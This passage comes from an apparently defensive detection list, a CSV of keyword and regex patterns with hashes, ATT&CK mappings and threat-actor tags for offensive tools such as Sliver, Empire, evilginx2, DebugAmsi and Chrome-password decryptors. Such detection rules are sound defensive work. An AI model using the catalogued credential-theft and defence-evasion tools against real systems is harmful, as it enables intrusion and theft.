T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*dcsyncclient.py*",".{0,1000}dcsyncclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*dd14d6cd273d756c527fc0fa4b55e5bc33518d51d713325846458df7894b0d24*",".{0,1000}dd14d6cd273d756c527fc0fa4b55e5bc33518d51d713325846458df7894b0d24.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*dd307d39038a79e45a140d13c406c084fceb840317a7c53a5d929012fa409cf3*",".{0,1000}dd307d39038a79e45a140d13c406c084fceb840317a7c53a5d929012fa409cf3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*dd3cd4783ec400f215c4f72f797fe310be12453c20944feec054a449835feb36*",".{0,1000}dd3cd4783ec400f215c4f72f797fe310be12453c20944feec054a449835feb36.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","8","2","195","29","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z" "*dd4543fa5f777ca9ad6ab6bf3d53cc8f186113da38d81159c776b1476eecb5e8*",".{0,1000}dd4543fa5f777ca9ad6ab6bf3d53cc8f186113da38d81159c776b1476eecb5e8.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*dd5cbddadb4446fe8e9558788ea449ac7f497973cf83ef9d8acc3803cfae956b*",".{0,1000}dd5cbddadb4446fe8e9558788ea449ac7f497973cf83ef9d8acc3803cfae956b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*dd6c8226641df9aa2a08e5e11949430e94773d763734ec3516a7976ad8d10f1a*",".{0,1000}dd6c8226641df9aa2a08e5e11949430e94773d763734ec3516a7976ad8d10f1a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*dd9203bd24970aceaa30d3241a10fd259380144e57a279021b4c4378fa6c5922*",".{0,1000}dd9203bd24970aceaa30d3241a10fd259380144e57a279021b4c4378fa6c5922.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*dd962b2de10f0a44beb1483ef05afce58151e471e9d0b79b7388f663292fd634*",".{0,1000}dd962b2de10f0a44beb1483ef05afce58151e471e9d0b79b7388f663292fd634.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*ddb178cbaaab362c61d3d061b366625d205f208553ddf341b1c8fae466e5bd6f*",".{0,1000}ddb178cbaaab362c61d3d061b366625d205f208553ddf341b1c8fae466e5bd6f.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*ddspoof*--enum-name-protection*",".{0,1000}ddspoof.{0,1000}\-\-enum\-name\-protection.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*ddspoof.py -*",".{0,1000}ddspoof\.py\s\-.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & 
Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*DDSpoof\spoofer_config.py*",".{0,1000}DDSpoof\\spoofer_config\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*DDSpoof-main*",".{0,1000}DDSpoof\-main.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*de0565be5697d5543b8abb888a6d3d94d7cfb2538500b74ee38010f54f96a96a*",".{0,1000}de0565be5697d5543b8abb888a6d3d94d7cfb2538500b74ee38010f54f96a96a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*de09af73cc55f3dfbf6bf40493075b3c93765aa0ad88e34b568eac727f6b0c03*",".{0,1000}de09af73cc55f3dfbf6bf40493075b3c93765aa0ad88e34b568eac727f6b0c03.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - 
TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*de569a85963dfe8966a51f5e5fdd9ecc9cbc30721fc2d624c4c29c6cf6d12adf*",".{0,1000}de569a85963dfe8966a51f5e5fdd9ecc9cbc30721fc2d624c4c29c6cf6d12adf.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*DE7B9E6B-F73B-4573-A4C7-D314B528CFCB*",".{0,1000}DE7B9E6B\-F73B\-4573\-A4C7\-D314B528CFCB.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*de81859bc3a1de8e35c2fa363f2405d7aff32f674cc3757caa1cc89235ec818e*",".{0,1000}de81859bc3a1de8e35c2fa363f2405d7aff32f674cc3757caa1cc89235ec818e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*deb.torproject.org/torproject.org/*",".{0,1000}deb\.torproject\.org\/torproject\.org\/.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*deb.torproject.org/torproject.org/*.asc*",".{0,1000}deb\.torproject\.org\/torproject\.org\/.{0,1000}\.asc.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*deb.torproject.org-keyring*",".{0,1000}deb\.torproject\.org\-keyring.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*debd82bfe5eaf80dfb9d254962df14431f231cde2c09b8efeeed73e4f263cd98*",".{0,1000}debd82bfe5eaf80dfb9d254962df14431f231cde2c09b8efeeed73e4f263cd98.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*debian-tor:x*",".{0,1000}debian\-tor\:x.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*DebugAmsi.exe*",".{0,1000}DebugAmsi\.exe.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","89","20","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*DebugAmsi.sln*",".{0,1000}DebugAmsi\.sln.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","89","20","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*DebugAmsi.vcxproj*",".{0,1000}DebugAmsi\.vcxproj.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","89","20","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*DebugAmsi-main*",".{0,1000}DebugAmsi\-main.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","89","20","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*DebugAmsix64.exe*",".{0,1000}DebugAmsix64\.exe.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - 
TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","89","20","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*DebugAmsix86.exe*",".{0,1000}DebugAmsix86\.exe.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","89","20","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*Dec0ne/KrbRelayUp*",".{0,1000}Dec0ne\/KrbRelayUp.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*dece45d516d8421e39684618e0b571f94d31dfaf0d0d20d6f4593f4ab67edb0b*",".{0,1000}dece45d516d8421e39684618e0b571f94d31dfaf0d0d20d6f4593f4ab67edb0b.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*deckard@tyrellcorporation.io*",".{0,1000}deckard\@tyrellcorporation\.io.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*DecodeRDPCache.ps1*",".{0,1000}DecodeRDPCache\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - 
T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*decoder-it/ADCSCoercePotato*",".{0,1000}decoder\-it\/ADCSCoercePotato.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*decoder-it/LocalPotato*",".{0,1000}decoder\-it\/LocalPotato.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*decoder-it/psgetsystem*",".{0,1000}decoder\-it\/psgetsystem.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embedded C#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","1","N/A","10","4","320","83","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z" "*decoder-it/TokenStealer*",".{0,1000}decoder\-it\/TokenStealer.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*Decode-RoutingPacket*",".{0,1000}Decode\-RoutingPacket.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*decoy_document.xls*",".{0,1000}decoy_document\.xls.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*decrypt.py .\*.txt utf-16-le*",".{0,1000}decrypt\.py\s\.\\.{0,1000}\.txt\sutf\-16\-le.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","0","N/A","10","6","567","85","2024-01-30T14:31:55Z","2019-04-09T07:41:42Z" "*decrypt_chrome_password(*",".{0,1000}decrypt_chrome_password\(.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*decrypt_chrome_password.py*",".{0,1000}decrypt_chrome_password\.py.{0,1000}","offensive_tool_keyword","decrypt-chrome-passwords","A simple program to decrypt chrome password saved on your machine.","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/ohyicong/decrypt-chrome-passwords","1","1","N/A","10","8","765","169","2024-02-08T20:07:35Z","2020-12-28T15:11:12Z" "*Decrypt-Bytes*",".{0,1000}Decrypt\-Bytes.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1056","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*decrypt-chrome-passwords-main*",".{0,1000}decrypt\-chrome\-passwords\-main.{0,1000}","offensive_tool_keyword","decrypt-chrome-passwords","A simple program to decrypt chrome password saved on your machine.","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/ohyicong/decrypt-chrome-passwords","1","1","N/A","10","8","765","169","2024-02-08T20:07:35Z","2020-12-28T15:11:12Z" "*Decrypt-CipherText*",".{0,1000}Decrypt\-CipherText.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*DecryptNextCharacterWinSCP*",".{0,1000}DecryptNextCharacterWinSCP.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
